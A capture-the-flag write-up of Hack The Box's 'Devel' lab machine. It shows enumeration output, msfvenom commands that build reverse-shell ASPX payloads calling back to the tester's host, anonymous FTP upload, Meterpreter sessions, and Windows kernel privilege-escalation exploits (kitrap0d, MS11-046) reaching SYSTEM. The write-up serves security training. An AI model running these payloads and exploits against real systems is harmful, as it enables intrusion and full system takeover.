Hack the Box Devel
9 min readJul 23, 2020
My write-up on HTB’s retired machine “Devel” that outlines Metasploit usage and manual exploitation.
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
Reconnaissance
First, let’s use the nmapAutomator to automate the process of recon/enumeration.
Summary of our nmap scan results:
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 20:52 EDT
Nmap scan report for 10.10.10.5
Host is up (0.020s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.05 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 20:52 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.5
Host is up (0.023s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp open http Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635:
| VULNERABLE:
| Remote Code Execution in HTTP.sys (MS15-034)
| State: VULNERABLE
| IDs: CVE:CVE-2015-1635
| A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
| caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
| successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|
| Disclosure date: 2015-04-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.97 secondsFurther enumeration
Manually checking port tcp/80
root@cainta:~/Documents/htb/Devel# nikto -h http://10.10.10.5/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.5
+ Target Hostname: 10.10.10.5
+ Target Port: 80
+ Start Time: 2020-06-05 21:39:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ /: Appears to be a default IIS 7 install.
+ 7863 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2020-06-05 21:44:11 (GMT-4) (263 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@cainta:~/Documents/htb/Devel#Executed Gobuster as well:
root@cainta:~/Documents/htb/Devel# gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.aspx,.asp -u http://10.10.10.5/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.5/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,aspx,asp
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/06/05 21:51:20 Starting gobuster
===============================================================
http://10.10.10.5/aspnet_client (Status: 301) [Size: 155]
===============================================================
2020/06/05 21:52:08 Finished
===============================================================FTP Service
Let’s see if we can upload a file and check if we can get a reverse shell, but first we need to create our .aspx file with reverse shell using msfvenom. Since we are covering both metasploit and manual exploitation, we’ll create meterpreter payload first.
root@cainta:~/Documents/htb/Devel# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f aspx LHOST=10.10.14.6 LPORT=4444 -o reverse-shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2984 bytes
Saved as: reverse-shell.aspxUpload reverse-shell.aspx via FTP
root@cainta:~/Documents/htb/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put reverse-shell.aspx
local: reverse-shell.aspx remote: reverse-shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2906 bytes sent in 0.00 secs (15.7465 MB/s)
ftp>Load Metasploit and listen on port 4444
msf5 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description
---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.6 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portExploit target:Id Name
-- ----
0 Wildcard Targetmsf5 exploit(multi/handler) >
Initial Foothold
msf5 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2020-07-21 07:48:47 -0400meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
We did get low priv service account ‘IIS APPPOOL’; Now let’s try to elevate our privilege.
User flag obtained
C:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1Directory of C:\Users\babis\Desktop18/03/2017 02:14 ▒▒ <DIR> .
18/03/2017 02:14 ▒▒ <DIR> ..
18/03/2017 02:18 ▒▒ 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.454.733.824 bytes free
Run exploit suggester and used ms10_015_kitrap0d.
msf5 exploit(windows/local/ms10_015_kitrap0d) > run[*] Started reverse TCP handler on 10.10.14.6:5555
[*] Launching notepad to host the exploit...
[+] Process 3388 launched.
[*] Reflectively injecting the exploit DLL into 3388...
[*] Injecting exploit into 3388 ...
[*] Exploit injected. Injecting payload into 3388...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:5555 -> 10.10.10.5:49158) at 2020-07-21 08:03:00 -0400meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Root flag obtained
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1Directory of C:\Users\Administrator\Desktop18/03/2017 02:17 ▒▒ <DIR> .
18/03/2017 02:17 ▒▒ <DIR> ..
18/03/2017 02:17 ▒▒ 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.455.270.400 bytes freeC:\Users\Administrator\Desktop>
Manual exploitation without the use of metasploit
Create payload using msfvenom
root@cainta:~/Documents/htb/Devel# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -f aspx LHOST=10.10.14.6 LPORT=4444 -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2927 bytes
Saved as: shell.aspxUse FTP service to upload file
root@cainta:~/Documents/htb/Devel# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
07-24-20 10:44PM 2984 reverse-shell.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2964 bytes sent in 0.00 secs (28.2669 MB/s)
ftp>Once completed, Set up netcat listener on port 4444
Our initial access is very limited, we do not even have access to any of the user’s folders.
Elevating our privilege
Ran exploit suggester and here are the results..
System Information:c:\inetpub\wwwroot>systeminfo
systeminfoHost Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ▒▒
System Boot Time: 26/7/2020, 11:46:11 ▒▒
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 701 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.521 MB
Virtual Memory: In Use: 526 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5Possible exploits:[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
Tried several exploits based on exploit suggester’s result and found one that works:
root@cainta:~/Documents/htb/Devel# searchsploit 40564
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-0 | windows_x86/local/40564.c
----------------------------------------------------------------------- ---------------------------------Compile the per the exploit notes:
Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32Once compiled, find a way to upload ‘MS11–046.exe’. I’ve use the FTP service to upload our exploit and executed it.
c:\inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1Directory of c:\inetpub\wwwroot26/07/2020 01:51 ▒▒ <DIR> .
26/07/2020 01:51 ▒▒ <DIR> ..
18/03/2017 02:06 ▒▒ <DIR> aspnet_client
17/03/2017 05:37 ▒▒ 689 iisstart.htm
26/07/2020 01:51 ▒▒ 299.312 MS11-046.exe
26/07/2020 01:10 ▒▒ 2.871 shell.aspx
17/03/2017 05:37 ▒▒ 184.946 welcome.png
4 File(s) 487.818 bytes
3 Dir(s) 24.607.924.224 bytes freec:\inetpub\wwwroot>MS11-046.exe
MS11-046.exec:\Windows\System32>whoami
whoami
nt authority\systemc:\Windows\System32>
Both user and root flag obtained
c:\Windows\System32>dir C:\users\administrator\desktop
dir C:\users\administrator\desktop
Volume in drive C has no label.
Volume Serial Number is 8620-71F1Directory of C:\users\administrator\desktop18/03/2017 02:17 ▒▒ <DIR> .
18/03/2017 02:17 ▒▒ <DIR> ..
18/03/2017 02:17 ▒▒ 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.611.110.912 bytes freec:\Windows\System32>dir C:\users\babis\desktop
dir C:\users\babis\desktop
Volume in drive C has no label.
Volume Serial Number is 8620-71F1Directory of C:\users\babis\desktop18/03/2017 02:14 ▒▒ <DIR> .
18/03/2017 02:14 ▒▒ <DIR> ..
18/03/2017 02:18 ▒▒ 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.611.110.912 bytes freec:\Windows\System32>
Lessons Learned
- Usage of other tools on elevating windows privilege such as windows-exploit-suggester.py and WinPEAS.
- There are times that suggested exploits may not work, so conducting research for kernel exploits is also necessary.
References
